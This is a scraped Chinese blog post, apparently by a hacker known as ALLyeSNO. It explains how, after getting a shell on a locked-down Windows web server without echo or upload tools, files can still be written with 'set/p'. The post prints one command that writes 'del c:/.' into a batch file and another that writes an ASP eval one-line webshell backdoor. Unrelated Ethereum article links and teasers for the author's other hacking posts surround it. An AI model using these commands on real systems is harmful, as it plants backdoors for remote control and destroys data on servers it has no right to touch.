假如对方是个BT(ALLyeSNO)

最新推荐文章于 2022-06-14 22:18:40 发布
最新推荐文章于 2022-06-14 22:18:40 发布
阅读量1.1k 收藏
点赞数
分类专栏: 原创文章 Bat Man 文章标签: bt javascript web服务 server shell c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/138294
版权
利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?

呵呵 改内核去掉了echo?

别怕 我们还有set 嘛

set/p allyesno=del c:/.>allyesno.bat

如果遇到转义字符就是^了 嘎嘎。。。

set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
freexploit
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
以太坊Ethereum区块中的Merkle trie:state,transaction,receipt
05-03
NULL 博文链接:https://lobin.iteye.com/blog/2323163
2020-09-08
weixin_41576919的博客
09-08 797
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 @[TOC](2020-09-08) 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 #1 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 #2 二、使用步骤 1.引入库 代..
动手编写一个以太坊智能合约
热门推荐
区块链大本营
09-14 2万+
一个以太坊节点提供一个RPC界面。这个界面给Ðapp(去中心化应用)访问以太坊区块链的权限和节点提供的功能,比如编译智能合约代码,它用JSON-RPC 2.0规范(不支持提醒和命名的参数) 的子集作为序列化协议,在HTTP和IPC (linux/OSX上的unix域接口,在Windows上叫pipe’s)上可用。
用镜像搭建一个新以太坊节点并部署合约(演示)
DDFFR的博客
08-09 3796
docker run -it –name node6 daocloud.io/ubuntu/node cd privategeth geth –datadir ./data/00 init genesis.json geth –identity “haha” –datadir ./data/00 –networkid 12345 –rpcapi “db,eth,net,web3” –p
谈谈区块链:以太坊的UTXO
well_2000_82的博客
02-16 2944
本来并没有计划写这篇文章,只是这两天微信里有一篇文章传播的比较厉害,叫:《其实并没有什么比特币,只有UTXO》。其中有这么一句话:HyperLedger 和Ethereum 一开始并没有采用 UTXO,现在前者已经切换回 UTXO,后者打算增加这个选项。很多朋友过来问我有没有这么回事,所以专门写一篇文章来阐述我的观点。这篇文章给大家造成很大的困扰,是因为大家都知道以太坊和Hyperledger当前...
以太坊中GetTransactionReceipt 与 GetTransactionByHash区别
09-05 5060
1:GetTransactionReceipt 返回的gas是真实交易消耗的 blocknumber不为空   GetTransactionByHash返回的gas是传过去的值 blocknumber有可能为空   2: cumulativeGasUsed 表示该交易所在块中的所有已被打包的交易中的gas的总和。  ...
最强以太坊源码解析-02-以太坊架构图
人生有梦不怕迟
12-16 1337
今天在网上看到一副描述以太坊框架的图示,拿过来分享一下: 这张图很犀利,建议诸位去按照这个图原封不动的画一遍,相信会有很多收获!
以太坊开发文档09 - javascriptApi
Lee的程序空间
12-14 1万+
Web3 JavaScriptÐappAPI 为了让您的应用程序能够在以太坊上工作,您可以使用web3.js库web3提供的对象。在底层,它通过RPC调用与本地节点通信。web3.js与任何暴露RPC层的以太坊节点一起工作。 web3包含eth对象 - web3.eth(专门用于以太坊区块链交互)和shh对象 - web3.shh(用于Whisper交互)。随着时间的推移,我们将介绍其他web
以太坊bloom和logs及代码解析
最新发布
cz911005的博客
06-14 4353
以太坊 bloom logs getLogs eth_getLogs
以太坊的getTransactionReceipt
Harry Wong的博客
01-06 1346
摘要以太坊的getTransactionReceipt得到logs,里面有几个log,说明合约内抛出了几个事件,用对应事件解析即可。 getTransactionReceipt得到logs,里面有3个log,说明合约内抛出了3个事件,用对应事件解析即可。 ...
以太坊小知识(五)——difficulty、totalDifficulty、cumulativeGasUsed、gasUsed
KeenCryp的博客
01-11 2157
difficulty &amp; totalDifficulty eth.getBlock(22) 输出: { difficulty: 17247064057, extraData: "0x476574682f6b6c6f737572652f76312e302e302d66633739643332642f6c696e ...
What is and how to calculate 'cumulative gas used'?
harrietliu的专栏
07-13 1180
First of all, let's understand what is the cumulative gas used. cumulativeGasUsed: Number - The total amount of gas used when this transaction was executed in the block. As suggested by Java
开发以太坊遇到的几个问题
changliangwl的专栏
03-02 3030
1.数据同步(根据帐号查询历史交易信息) https://ethereum.stackexchange.com/questions/2531/common-useful-javascript-snippets-for-geth/3478#3478   function getTransactionsByAccount(myaccount, startBlockNumber, endBloc...
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8647
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8539
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8156
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
迅速删除非法文件名代码的 0day 呵呵
FreeXploiT
11-12 7647
allyesno:我们会遇到很多所谓非法的文件名例如 .. con nul 等等FlowerCode 给出了以下方法可以快速删除这些文件名http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html 两行代码搞定,迅速删除使用非法文件名的文件及文件夹  2007年06月04日 星期一 19:08
fuckipb batShell
FreeXploiT
04-29 6817
这个exploit是在0x557.cn irc room superhei 那里得知的 thx exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell 运行情况输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org输入网站地址:bbs.null.com输入论坛目录 例如 http://www.ph4
CMD记录器改良版
FreeXploiT
09-29 6645
 文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)改的不是很良 勉强可用 或许应该弄多一点容错代码 体力活啊。。安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Curren
regini 可是一个好用强大的工具!
FreeXploiT
01-18 6090
My site: http://blog.csdn.net/freexploit/regini 可是一个好用强大的工具!我仔细查阅了 微软的资料 发现说的含糊不清 google了下也是 寥寥几笔这个玩意主要用途是 在cmd下 修改注册表 以及 注册表权限!用法研究了一晚上 弄出来了 ,微软上写的 根本不能用啊 郁闷。。使用方法C:/>regini regset.ini 就行啦regset.ini

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值